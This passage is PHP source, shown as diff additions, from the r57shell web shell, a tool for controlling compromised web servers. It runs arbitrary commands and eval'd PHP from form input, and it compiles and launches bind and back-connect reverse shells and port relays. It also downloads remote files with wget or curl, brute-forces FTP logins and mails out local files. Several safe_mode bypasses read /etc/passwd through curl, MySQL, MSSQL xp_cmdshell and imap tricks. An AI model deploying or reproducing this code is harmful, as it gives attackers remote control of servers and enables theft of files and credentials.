("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'test5': + if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); + $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $lines = file ('/tmp/mb_send_mail'); + foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; } + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo $str; + @imap_close($stream); + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } + else { echo "[-] ERROR! Can't write in dump file"; } + } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function up_down($id) + { + global $lang; + global $language; + return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">'; + } +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts; +echo 